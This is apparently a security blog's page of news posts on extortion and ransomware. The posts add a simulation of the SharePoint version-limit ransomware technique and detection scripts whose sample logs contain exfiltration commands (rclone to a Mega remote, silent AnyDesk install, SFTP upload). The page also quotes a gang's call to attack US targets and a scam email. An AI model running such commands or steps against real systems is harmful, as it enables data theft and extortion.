Showing posts with label Extortion.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic


According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed at the facility, which is the busiest in the Western Hemisphere. In many cases the apparent goal is to harm the US economy, although profit through extortion and data theft is also a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers have described a way to abuse an Office 365 feature so that files stored on SharePoint Online and OneDrive can be held to ransom. When they informed Microsoft, they were told that the system was functioning as designed and that this is a feature rather than a vulnerability. 

Files stored and updated in the cloud have long been thought to be resistant to encryption extortion, since the autosave and versioning capabilities should offer enough backup capability. Researchers at Proofpoint have shown that this is a false assumption. They reported, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.” 

There are two ways to accomplish this using the Microsoft versioning feature, which allows the user to specify the maximum number of older versions to be stored. Older versions beyond that limit are difficult, if not impossible, to recover. The first attack is more theoretical than practical, while the second is undeniably practical. By default, the maximum number of revisions of a document that may be saved is 500. Simply put, the attacker modifies and encrypts the file 501 times. 

The changes do not have to be significant, just enough to cause the system to save a new (encrypted) version. By the end of the procedure every retained version of the document is encrypted, and the file is unrecoverable without the decryption key. This is a theoretical attack: in practice it would be noisy and easily discovered. The second method is more practical: use the built-in, user-controlled versioning setting to reduce the number of stored versions to one. 

Every SharePoint and OneDrive document library includes a user-configurable parameter for the number of stored versions, which can be found under list settings for each document library. Setting the version limit to zero does not help an attacker since it does not erase older versions that the user can still recover. 

If the limit is set to one, the file only has to be encrypted twice before the user loses access to its contents. If information is exfiltrated before encryption, the attacker also has the option of a second extortion attempt. The attack chain consists of initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration and encryption, and finally extortion. 
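To make the two version-history attacks concrete, here is a small simulation, added here as an example; it is not Proofpoint's or Microsoft's code. The DocumentLibrary model, its audit log, the fake_ransomware_round keystream, the actor name and the sample document are all constructed, and the trimming rule is chosen only so that the model reproduces the counts quoted above (501 saves at the default limit of 500, two saves at a limit of one); it is not a claim about the service's exact implementation.

```python
"""Simulation of SharePoint Online / OneDrive version-limit abuse.

Added example, not Proofpoint's or Microsoft's code. DocumentLibrary, its audit
log, the keyed-XOR stand-in for file encryption and the sample document are all
constructed for illustration. The trimming rule only reproduces the counts in
the text (501 saves at the default limit of 500, 2 saves at a limit of 1).
"""
import hashlib
from collections import deque

DEFAULT_MAJOR_VERSION_LIMIT = 500                # default quoted in the text
ORIGINAL = b"Q3 board minutes - CONFIDENTIAL"    # constructed sample document
ATTACKER_KEY = b"attacker-held-key"              # constructed; never stored on the victim


class DocumentLibrary:
    """Each save appends a version. Before appending, existing versions are
    trimmed to the configured limit, so the oldest ones fall off and are gone."""

    def __init__(self, version_limit=DEFAULT_MAJOR_VERSION_LIMIT):
        self.version_limit = version_limit
        self.files = {}       # file name -> deque of version contents, oldest first
        self.audit_log = []   # (event, actor, old_value, new_value), as a SIEM would see it

    def save(self, name, content):
        versions = self.files.setdefault(name, deque())
        # A limit below 1 is modelled as "keep everything", matching the text's
        # note that setting the limit to zero does not erase older versions.
        if self.version_limit >= 1:
            while len(versions) > self.version_limit:
                versions.popleft()
        versions.append(content)

    def set_version_limit(self, actor, limit):
        """User-controlled library setting; the practical attack sets it to 1.
        Existing versions are not trimmed until the next save."""
        self.audit_log.append(("VersionLimitChanged", actor, self.version_limit, limit))
        self.version_limit = limit

    def recoverable(self, name, content):
        """True if `content` is still somewhere in the file's version history."""
        return content in self.files.get(name, ())


def fake_ransomware_round(plaintext, key, round_no):
    """Deterministic keyed-XOR stand-in for real file encryption. A fresh
    keystream per round makes every saved version distinct, as a real cipher
    with a fresh nonce would. This is NOT a secure cipher."""
    stream = hashlib.sha256(key + round_no.to_bytes(4, "big")).digest()
    return bytes(b ^ stream[i % len(stream)] for i, b in enumerate(plaintext))


def run_attack(rounds, attacker_limit=None):
    """Seed a library with one document, optionally lower the version limit as
    the attacker would, save `rounds` encrypted versions and return the library."""
    lib = DocumentLibrary()
    lib.save("minutes.docx", ORIGINAL)
    if attacker_limit is not None:
        lib.set_version_limit("compromised.user@example.com", attacker_limit)
    for r in range(1, rounds + 1):
        lib.save("minutes.docx", fake_ransomware_round(ORIGINAL, ATTACKER_KEY, r))
    return lib


def limit_reductions(audit_log):
    """Detection hook: a reduction of the version limit is rare in normal use
    and is the pivot of the practical attack, so every one deserves an alert."""
    return [e for e in audit_log if e[0] == "VersionLimitChanged" and e[3] < e[2]]


if __name__ == "__main__":
    for label, lib in [("default limit, 500 rounds", run_attack(500)),
                       ("default limit, 501 rounds", run_attack(501)),
                       ("limit 1, 1 round", run_attack(1, attacker_limit=1)),
                       ("limit 1, 2 rounds", run_attack(2, attacker_limit=1)),
                       ("limit 0, 5 rounds", run_attack(5, attacker_limit=0))]:
        print(f"{label}: original recoverable = "
              f"{lib.recoverable('minutes.docx', ORIGINAL)}, "
              f"alerts = {len(limit_reductions(lib.audit_log))}")
```

The two cases that matter for defenders are the last three lines of output: at a limit of one the original survives the first encrypted save but not the second, and the only signal that precedes the loss is the VersionLimitChanged event, which is why that setting change, not the file writes, is the thing to alert on.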

If the file owner keeps a local copy of the file, the impact of this attack is limited; in that case the attacker must compromise both the endpoint and the cloud account to succeed. Proofpoint followed Microsoft's disclosure process and reported the issue to Microsoft before publishing it. 

Microsoft stated that, first, the versioning settings function properly, and that, second, previous versions of files can potentially be retrieved and restored for an additional 14 days with the aid of Microsoft Support. 

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

The conclusion is straightforward: do not assume that files saved and updated in the cloud are immune to extortion attempts. Ransomware mitigation procedures, including backups that an attacker holding the cloud account cannot reach, must still be in place.

A Cyber-Attack has Disrupted Slovenia's Most Popular TV Channel


In what appears to be an extortion attempt, a cyber-attack has crippled the operations of Pop TV, Slovenia's most popular TV channel. The attack, which occurred on Tuesday, disrupted Pop TV's computer network, preventing the firm from displaying computer graphics for the evening edition of 24UR, the station's daily news broadcast. 

Pop TV said in a statement on Tuesday, the day of the attack, that the night edition of the same show was cancelled entirely, although a truncated version of the news appeared on the company's website. While news broadcasts resumed the following day, the attack affected other parts of the network's operation. 

"At Pro plus media house, we are rebuilding a business that has been disrupted by a recent cyber-attack. We cannot yet estimate the full extent of the attack, we are currently focusing all our efforts on putting our main systems back into their original operation as soon as possible, which will enable the smooth operation of television programs and websites," the company said. 

Pop TV stated in a second statement on Wednesday that the attack also targeted several of its online servers, including VOYO, an on-demand streaming platform that includes channels from its parent firm as well as licensed movies and TV shows. The attack, according to the firm, stopped its employees from contributing new content to the site as well as broadcasting any of its channels or live sporting events, such as the Winter Olympics, which enraged many of its paid users. 

According to the Slovenian news outlet Zurnal24, Pop TV is being extorted by international hackers in what looks to be a ransomware-style attack. Slovenia's Computer Emergency Response Team, SI-CERT, also published a statement, saying that it was assisting the TV station in dealing with the incident but refused to provide any further insights.

Several prominent TV stations have been targeted by cyber-attacks in recent years, including France's M6 (October 2019), The Weather Channel (April 2019), the Cox Media Group (June 2021), the Sinclair Broadcast Group in the United States (October 2021), Portugal's SIC (January 2022), and Iran's IRIB (February 2022). 

With the exception of the IRIB incident, most of these were ransomware attacks on the stations' back-end IT infrastructure, taking broadcasts offline for hours while engineers worked to restore systems, which suggests that Pop TV got off more lightly than most of the earlier victims.

U.S. Cyber Command Officially Links MuddyWater Gang to Iranian Intelligence


The US military's Cyber Command on Wednesday officially tied the Iranian-backed MuddyWater hacking group to Iran's Ministry of Intelligence and Security (MOIS).

According to Cyber Command, the hacking group was first identified in 2017 and is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), which is involved in both domestic surveillance operations and the targeting of a wide spectrum of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East.

"MuddyWater is an Iranian threat group; previously, the industry has reported that MuddyWater has primarily targeted Middle Eastern nations, and has also targeted European and North American nations," Cyber Command said in a statement.

On Twitter, Cyber Command said the malicious group was employing a suite of malware for espionage and malicious activity. "MOIS hacker group MuddyWater is using open-source code for malware," it said. "MuddyWater and other Iranian MOIS APTs are using DNS tunneling to communicate to its C2 infrastructure; if you see this on your network, look for suspicious outbound traffic."

In partnership with the FBI, USCYBERCOM's Cyber National Mission Force (CNMF) has also shared multiple malware samples of PowGoop, a DLL loader designed to decrypt and run a PowerShell-based malware downloader. Five of the files that CYBERCOM has uploaded to VirusTotal this week aren’t identified as malicious by any of the antivirus engines in the scanning service, while six others have very low detection rates.

"If you see a combination of these tools, Iranian MOIS actor MuddyWater may be in your network. MuddyWater has been seen using a variety of techniques to maintain access to victim networks," the US military command added. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."
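Cyber Command's advice to look for DNS tunnelling is a hunt that needs some heuristics behind it. The detector below is an added example, not Cyber Command's, the FBI's or any vendor's tooling; the log format, every line in SAMPLE_LOG, the client addresses and the scoring thresholds are constructed, and the thresholds are starting points to tune against a real network's baseline rather than tested values.

```python
"""Heuristic detector for DNS-tunnelled C2 traffic.

Added example, not Cyber Command's, the FBI's or any vendor's tooling. The log
format and every line in SAMPLE_LOG are constructed, and the thresholds are
illustrative starting points that need tuning against a real network's baseline.
"""
import math
import re
from collections import defaultdict

# Constructed resolver-style query log: timestamp, client IP, query type, name.
SAMPLE_LOG = """\
2022-01-12T09:00:01Z 10.1.2.33 A www.example.com
2022-01-12T09:00:02Z 10.1.2.33 A mail.example.com
2022-01-12T09:00:04Z 10.1.2.33 A www.example.com
2022-01-12T09:00:06Z 10.1.2.33 AAAA www.example.com
2022-01-12T09:00:08Z 10.1.2.33 A api.example.com
2022-01-12T09:00:09Z 10.1.2.33 A mail.example.com
2022-01-12T09:00:10Z 10.1.2.41 TXT 0123456789abcdef0123456789abcdef.t.example.org
2022-01-12T09:00:11Z 10.1.2.41 TXT fedcba9876543210fedcba9876543210.t.example.org
2022-01-12T09:00:12Z 10.1.2.41 TXT 02468ace13579bdf02468ace13579bdf.t.example.org
2022-01-12T09:00:13Z 10.1.2.41 TXT fdb97531eca8642013579bdf02468ace.t.example.org
2022-01-12T09:00:14Z 10.1.2.41 TXT a1b2c3d4e5f60789a1b2c3d4e5f60789.t.example.org
2022-01-12T09:00:15Z 10.1.2.41 TXT 9870f6e5d4c3b2a19870f6e5d4c3b2a1.t.example.org
2022-01-12T09:00:16Z 10.1.2.41 A www.example.com
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
PAYLOAD_QTYPES = {"TXT", "NULL", "CNAME", "MX"}   # record types that carry data back


def shannon_entropy(s):
    """Bits per character: about 4 for hex-looking payload, well under 3 for words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels. A deployment should use the Public Suffix List instead,
    otherwise co.uk-style names are grouped wrongly."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            ts, client, qtype, qname = m.groups()
            records.append({"ts": ts, "client": client,
                            "qtype": qtype.upper(), "qname": qname.lower()})
    return records


def score_groups(records, min_queries=5):
    """Group queries per (client, registered domain) and score four features
    that separate tunnelling from ordinary resolution: long subdomains, high
    entropy, almost every query name unique, and payload-carrying record types."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], registered_domain(r["qname"]))].append(r)
    findings = []
    for (client, domain), qs in groups.items():
        if len(qs) < min_queries:
            continue
        subs = [q["qname"][:-len(domain) - 1] for q in qs
                if q["qname"].endswith("." + domain)]
        if not subs:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        unique_ratio = len(set(subs)) / len(subs)
        payload_ratio = sum(q["qtype"] in PAYLOAD_QTYPES for q in qs) / len(qs)
        score = sum([avg_len >= 30, avg_entropy >= 3.5,
                     unique_ratio >= 0.9, payload_ratio >= 0.5])
        findings.append({"client": client, "domain": domain, "queries": len(qs),
                         "avg_subdomain_len": round(avg_len, 1),
                         "avg_entropy": round(avg_entropy, 2),
                         "unique_ratio": round(unique_ratio, 2),
                         "payload_ratio": round(payload_ratio, 2), "score": score})
    return findings


def suspicious(text, min_score=3):
    """Groups scoring at least min_score of 4: the list an analyst pivots on."""
    return [f for f in score_groups(parse_log(text)) if f["score"] >= min_score]


if __name__ == "__main__":
    for f in suspicious(SAMPLE_LOG):
        print(f)
```

Run against the constructed sample, only the 10.1.2.41 traffic to example.org is flagged, on all four features; the ordinary lookups from 10.1.2.33 score zero. Real tunnels also show up as sustained query volume to one domain that no other client touches, so in production the per-client grouping here should be joined with a fleet-wide rarity count before anything pages an analyst.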

Last November, cyber authorities in the US, UK, and Australia attributed attacks exploiting vulnerabilities in Fortinet and Microsoft Exchange products to Iranian-backed attackers. Rather than targeting a particular sector of the economy, the actors simply exploited the vulnerabilities wherever possible and then attempted to turn that initial access into data exfiltration, a ransomware attack, or extortion.

‘Karakurt’ Extortion Back with an Upswing


As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration followed by extortion, which allows it to operate swiftly. It had claimed more than 40 victims by September, 95 percent of them in North America and the rest in Europe, according to a report released on Friday by the researchers. 

Experts suggest Karakurt could be a trend-setter: similar groups may soon shift away from attacking large corporations or critical-infrastructure providers with ransomware and adopt the same exfiltration-and-extortion approach instead. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was first spotted by investigators outside Accenture Security in June, when it started building up its network and data-leak infrastructure. In August, the group registered the domains karakurt.group and karakurt.tech, as well as the Twitter handle @karakurtlair, and shortly afterwards launched its first successful attack. 

Accenture Security's collection sources and intrusion research identified the group's first victim in September; two months later, the group named that victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTPs) for infiltrating victim infrastructure, establishing persistence, moving laterally, and stealing data are similar to those used by numerous threat actors, and the group frequently takes a "living off the land" approach, using tools and features already present on the targeted systems. 

To maintain persistence once inside a network, Karakurt primarily relies on service installation, remote-management software, and the deployment of Cobalt Strike command-and-control (C2) beacons throughout the victim environment. 

However, experts have noticed that the group recently appears to have changed its approach to backup persistence. Rather than deploying Cobalt Strike, Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices," they stated. This lets the gang move laterally using previously obtained user, service, and administrator credentials. 

Researchers stated the gang also uses other remote-management tools, such as the remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to move laterally and locate data worth stealing for extortion. 

Nevertheless, the group's attack pattern so far shows that it is adaptable enough to change techniques according to the victim's environment. Karakurt can also evade detection in many cases because it frequently uses legitimate credentials for access. 

Finally, to steal data Karakurt uses 7zip and WinZip for compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to Mega.io cloud storage. According to Accenture Security, the staging folders used to prepare data for exfiltration were C:\PerfLogs and C:\Recovery. 
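The tooling above is all legitimate software, so the detection opportunity is the combination on one host rather than any single binary. The hunt below is an added example, not Accenture's tooling; the event format, hostnames, user names and every command line in SAMPLE_EVENTS are constructed, the indicators are only the ones named in this post (7-Zip/WinZip, Rclone, FileZilla over SFTP, AnyDesk, and the C:\PerfLogs and C:\Recovery staging folders), and a real deployment would baseline each one against its own legitimate use first.

```python
"""Process-creation hunt for the Karakurt exfiltration chain described above.

Added example, not Accenture's tooling. The log format, hostnames, users and
every command line in SAMPLE_EVENTS are constructed; the indicators are only
the ones the text names (7-Zip/WinZip, Rclone, FileZilla/SFTP, AnyDesk, and
the C:\\PerfLogs and C:\\Recovery staging folders).
"""
import re
from collections import defaultdict

STAGING_DIRS = (r"c:\perflogs", r"c:\recovery")
ARCHIVERS = {"7z.exe", "7za.exe", "wzzip.exe"}
MEGA_RE = re.compile(r"\bmega[a-z0-9_-]*:")         # an rclone remote named for Mega
REMOTE_RE = re.compile(r"\s[a-z0-9_-]+:(?!\\)")     # any rclone remote (remote:path), not C:\
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image="(?P<image>[^"]+)" cmdline="(?P<cmd>[^"]*)"$')

# Constructed Sysmon-style process-creation events (one per line).
SAMPLE_EVENTS = r"""
2021-09-14T02:10:05Z host=ws-hr-02 user=CORP\bob image="C:\Program Files\7-Zip\7z.exe" cmdline="7z.exe a C:\Users\bob\Documents\photos.7z C:\Users\bob\Pictures"
2021-09-14T02:41:17Z host=ws-fin-07 user=CORP\svc_backup image="C:\Program Files\7-Zip\7z.exe" cmdline="7z.exe a -p C:\PerfLogs\fin.7z \\fs01\finance\2021"
2021-09-14T02:55:40Z host=ws-fin-07 user=CORP\svc_backup image="C:\PerfLogs\rclone.exe" cmdline="rclone.exe copy C:\PerfLogs mega:archive --transfers 8"
2021-09-14T03:02:01Z host=ws-fin-07 user=CORP\svc_backup image="C:\Users\svc_backup\Downloads\AnyDesk.exe" cmdline="AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"
2021-09-14T03:15:22Z host=bkp01 user=CORP\svc_backup image="C:\Tools\rclone.exe" cmdline="rclone.exe sync D:\Backups s3prod:nightly"
2021-09-14T03:20:09Z host=ws-fin-07 user=CORP\svc_backup image="C:\Program Files\FileZilla FTP Client\filezilla.exe" cmdline="filezilla.exe sftp://upload@203.0.113.10"
"""


def parse_events(text):
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["exe"] = e["image"].rsplit("\\", 1)[-1].lower()
            e["cmd_l"] = e["cmd"].lower()
            events.append(e)
    return events


def classify(e):
    """Tag one event with each Karakurt-style behaviour it matches."""
    tags = []
    exe, cmd = e["exe"], e["cmd_l"]
    touches_staging = (any(d in cmd for d in STAGING_DIRS)
                       or any(d in e["image"].lower() for d in STAGING_DIRS))
    if exe in ARCHIVERS and touches_staging:
        tags.append("archive-into-staging-dir")
    if exe == "rclone.exe":
        if MEGA_RE.search(cmd):
            tags.append("rclone-to-mega")
        elif REMOTE_RE.search(cmd):
            tags.append("rclone-to-remote")
    if exe == "filezilla.exe" and "sftp://" in cmd:
        tags.append("filezilla-sftp")
    if exe == "anydesk.exe" and "--install" in cmd:
        tags.append("anydesk-install")
    if touches_staging and exe in {"rclone.exe", "filezilla.exe"}:
        tags.append("exfil-tool-on-staging-dir")
    return tags


def hunt(text):
    """Every event with at least one tag, in log order."""
    findings = []
    for e in parse_events(text):
        tags = classify(e)
        if tags:
            findings.append({"ts": e["ts"], "host": e["host"], "user": e["user"],
                             "exe": e["exe"], "tags": tags})
    return findings


def triage(findings):
    """Correlate per host: staging plus an exfil or remote-access tool on the
    same host is the chain the text describes; a lone hit is a lead to review."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].update(f["tags"])
    verdict = {}
    for host, tags in per_host.items():
        staged = {"archive-into-staging-dir", "exfil-tool-on-staging-dir"} & tags
        moved = any(t.startswith(("rclone", "filezilla", "anydesk")) for t in tags)
        verdict[host] = "high" if staged and moved else "review"
    return verdict


if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print(triage(hits))
```

On the constructed sample the HR workstation's ordinary 7-Zip use produces nothing, the backup server's rclone sync to an S3 remote is a single "review" lead, and ws-fin-07 reaches "high" because archiving into C:\PerfLogs, an rclone copy of that folder to a Mega remote, an AnyDesk install and an SFTP session all land on the same host within the hour.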

Researchers offered standard mitigation recommendations to enterprises to avoid being breached and extorted by Karakurt, which, once data has been stolen, calls victims repeatedly to pressure them into paying.

Groove Ransomware Gang Approaches other Ransomware Gangs to Strike Attacks against the US


Following the takedown of REvil's networks and infrastructure by law enforcement last week, the Groove ransomware gang has called on other extortion groups to strike US interests. 

The REvil ransomware operation was taken down again over the weekend, according to BleepingComputer, when an unidentified third party hijacked its dark web domains. The Russian-led REvil syndicate was brought down by an extensive multi-country law enforcement investigation, which led to its network being hacked and knocked offline for the second time, in the latest effort by governments to destabilize the lucrative ransomware ecosystem. 

During this takedown, a known REvil operator alleged that the unknown party was "looking" for them by changing configuration settings to lure the threat actor into visiting a site maintained by the mysterious entity. According to Reuters, REvil's takedown was the culmination of a multinational law enforcement effort that included FBI assistance. 

In a Russian blog post, the Groove ransomware group urged all the other ransomware organizations to target and attack US interests. 

The blog post also urges ransomware operators not to target Chinese enterprises, as organizations may need to utilize the nation as a haven if Russia takes a tougher stance against cybercriminals operating within its borders. 

The entire translated message, with some unacceptable phrases censored, read:

"In our difficult and troubled time when the US government is trying to fight us, I call on all partner programs to stop competing, unite and start xxcking up the US public sector, show this old man who is the boss here who is the boss and will be on the Internet while our boys were dying on honeypots, the nets from rude aibi squeezed their own... but he was rewarded with higher and now he will go to jail for treason, so let's help our state fight against such ghouls as cybersecurity firms that are sold to amers, like US government agencies, I urge not to attack Chinese companies, because where do we pinch if our homeland suddenly turns away from us, only to our good neighbors - the Chinese! I BELIEVE THAT ALL ZONES IN THE USA WILL BE OPENED, ALL xxOES WILL COME OUT AND xxCK THIS xxCKING BIDEN IN ALL THE CRACKS, I myself will personally make efforts to do this" - Groove ransomware. 

The possibility of assaults on US interests is consistent with previous information supplied this week to BleepingComputer by a threat intelligence analyst for a Dutch bank. 

After shutting down and splitting from the original Babuk ransomware operation, a threat actor known as 'Orange' created the RAMP hacking forum in July 2021. Because Orange still controlled Babuk's Tor site, he used it to build the forum, where he served as an administrator. Orange is also thought to be a representative of the Groove ransomware operation. 

Orange recently resigned as the forum's administrator to explore a new venture, but he provided no additional details. 

In addition, a subsequent tweet suggests that the threat actor is likely launching a new ransomware campaign, having actively sought to purchase network access to US hospitals and government entities. 

It's indeed unknown if 'Orange' would carry out these assaults on US firms as part of the Groove operation or initiate a separate ransomware campaign.

USD 50 Million Ransom Demanded from Saudi Aramco Over Leaked Data


Saudi Arabia's state oil firm admitted on Wednesday that data from the corporation was leaked and that the files are now being used in a cyber-extortion effort including a USD 50 million ransom demand. The data was presumably leaked by one of the company's contractors. Saudi Aramco, the Saudi Arabian Oil Co., notified The Associated Press that it "recently became aware of the indirect release of a limited amount of company data which was held by third-party contractors."

Saudi Aramco is a public Saudi Arabian oil and gas enterprise headquartered in Dhahran. It is estimated to be one of the world's most profitable corporations as of 2020. Saudi Aramco has the world's second-biggest proven crude oil reserves, about 270 billion barrels (43 billion cubic metres), as well as the world's greatest daily oil production. 

The Master Gas System, operated by Saudi Aramco, is the world's biggest single hydrocarbon network. It handles about one hundred oil and gas fields in Saudi Arabia, including 288.4 trillion standard cubic feet (scf) of natural gas reserves, and its crude oil production totaled 3.4 billion barrels (540 million cubic metres) in 2013. The Ghawar Field, the world's largest onshore oil field, and the Safaniya Field, the world's largest offshore oil field, are both operated by Saudi Aramco. 

The oil company did not specify which contractor was affected, nor did it clarify whether the contractor was hacked or if the information was released in some other way. "We confirm that the release of data was not due to a breach of our systems, has no impact on our operations and the company continues to maintain a robust cybersecurity posture," Aramco said. 

The AP found a page on the darknet, a section of the internet kept behind an encrypted network and accessible only through specific anonymity-providing tools, that claimed the extortionist had 1 terabyte of Aramco data. The page offered Aramco the chance to have the data destroyed for USD 50 million in cryptocurrency, with a timer counting down from USD 5 million, most likely to put pressure on the corporation. It is still unknown who is behind the ransom plot. 

Aramco has previously been the victim of cyber-attacks. The so-called Shamoon computer virus, which destroyed hard drives and then flashed a picture of a burning American flag on computer displays, affected the oil behemoth in 2012. Aramco was compelled to shut down its network and destroy over 30,000 machines as a result of the attack. Later, US officials blamed the strike on Iran, whose nuclear enrichment programme had just been targeted by the Stuxnet virus, which was most likely created by the US and Israel.

Shell’s Employees’ Visas Dumped Online as part of Extortion Attempt

Royal Dutch Shell became the latest corporation to witness an attack by the Clop ransomware group. The compromised servers were rebuilt and brought into service with a new Accellion security patch; the security patch eliminates the vulnerabilities and enhances security controls to detect new attacks and threats. 

"A cyber incident impacted a third-party, Accellion, software tool called the File Transfer Appliance (FTA) which is used within Shell," a Shell spokesperson said. In a statement last week, Shell confirmed that it too was affected by the security incident, but that it only affected the Accellion FTA appliance, which the company uses to transfer large data files securely. 

In an attempt to pressure the company into paying a ransom, the criminals behind the campaign siphoned sensitive documents from a file-transfer system used by Shell and leaked some of the data online, including a set of employees' passport and visa scans. The implied bargain is that once the ransom is paid, no further information will be released into the public domain. 

As stated by Shell, the data accessed during a “limited window of time” contained some personal data together with data from Shell companies and some of their stakeholders. Playing down the impact, the company stated that “there is no evidence of any impact to Shell’s core IT systems,” and that the server accessed was “isolated from the rest of Shell’s digital infrastructure.” But it did acknowledge that the attackers had probably taken “some personal data and data from Shell companies and some of their stakeholders.” 

Earlier this month, files from infosec outfit Qualys, including purchase orders, appliance scan results, and quotations, also surfaced on the extortionists' hidden site. Other victims include Canadian aerospace firm Bombardier, which had details of a military-grade radar leaked, London ad agency The7stars, and German giant Software AG.

The group has now posted several documents to its Tor-hidden website, including scans of supposed Shell employees' US visas, a passport page, and files from its American and Hungarian offices, in order to persuade Shell to compensate the hackers and prevent more stolen data from leaking. 

According to BleepingComputer, to increase the pressure, the Clop gang now e-mails its victims to warn them that their data has been stolen and will be leaked if a ransom is not paid.

Serco Affirms Babuk Ransomware Attack


Outsourcing giant Serco has affirmed that parts of its infrastructure in mainland Europe have been hit by a double extortion ransomware assault from the new Babuk group, however, the parts of its operation relating to the NHS Test and Trace program are unaffected. “Serco’s mainland European business has been subject to a cyber-attack,” a Serco representative said. “The attack was isolated to our continental European business, which accounts for less than 3% of our overall business. It has not impacted our other business or operations.” 

The incident comes as security firms and insurers increasingly stress that digital extortionists borrow other attackers' techniques, outsource parts of their operations and depend on partners to infiltrate victim networks. Although the NHS Test and Trace program was unaffected by the incident, ThreatConnect EMEA vice-president Miles Tappin said the vulnerabilities in Serco's wider systems were of great concern, and that the Babuk attack exposed “inherent weaknesses of the system”. 

“Like many actors new to the world of ransomware, the actor behind Babuk ransomware has been learning on the job while drawing insights from other criminal groups,” said Allan Liska, an intelligence analyst at the threat intelligence company Recorded Future. In the ransom note, Babuk's operators claimed to have had access to Serco's systems for three weeks and to have already exfiltrated a terabyte of data. The cybercriminals made explicit references to Serco partners, including Nato and the Belgian Army, and threatened Serco with consequences under the General Data Protection Regulation (GDPR). 

The attacker has demanded ransoms of $60,000 to $85,000, although that is “likely to increase over time as the threat actor becomes more experienced in ransomware operations,” according to a private analysis from PricewaterhouseCoopers obtained by CyberScoop. Babuk is far from sophisticated. Its code has contained mistakes that prevented it from executing on some targeted computers, according to PwC. “We assess that, due to a disregard for error checking, Babuk would fail to execute altogether in some environments,” the analysis says. 

However, while Babuk is still a relatively low-level threat to organisations, according to Liska, that could change if its operators can make more money from attacks and invest in new capabilities.

Cyber Extortionist Pretends To Be From US Police; Demands $2000 in Bitcoin To Delete Evidence!

A cyber extortionist poses as a US state police detective and promises to delete child pornography "evidence" for $2,000 in Bitcoin, even including a phone number that can be used to contact the scammer.

“Sextortion” emails, in which the sender claims that the recipient's computer has been hacked and that they were recorded while visiting adult sites, have become quite common.

Other extortionists pretend to be hitmen demanding money to call off the hit, make bomb threats, or threaten to tarnish a website's reputation.


The extortionist described here accuses the victim of child pornography and says the evidence will be deleted if they pay the sender $2,000 in Bitcoin.

Florida, Minnesota, Georgia, Tennessee, California and New York are a few of the states that victims reported the emails claiming to come from.

Per sources, the email sent by the extortionists pretending to be from the Tennessee State Police included the following phrases:
·       “Do not ignore the important warning”
·       “I work in the Bureau of Criminal Investigation, detective branch Crime Prevention with child abuse.”
·       “You uploaded video child-porno to websites”
·       “not possible to prove you didnt this”
·       “I retire in next month and want to earns some money for self”
·       “Pay me to Bitcoin wallet”
·       “This is anonymous money I want 2000$”
·       “Send transfer to my wallet”
·       “My temporary phone to contact”
·       “After receiving payments, I delete All materials”
·       “If you don’t pay me, I sending materials to The Tennessee Crime Laboratory.”

All the emails are identical, with the same Bitcoin address (17isAHrP2cZSY8vpJrTs8g4MHc1FDXvAMu); only the state's name differs.

The attacker(s) appear to be using a data breach dump that contains both email and home addresses, so that the state named in the email can be matched to the target's state of residence.

Extortion scams do not usually include a contact number for the scammer, and matching the state named in the email to the recipient's state of residence is an unusual touch.

But any email in which the sender demands money should be treated as a scam and deleted.

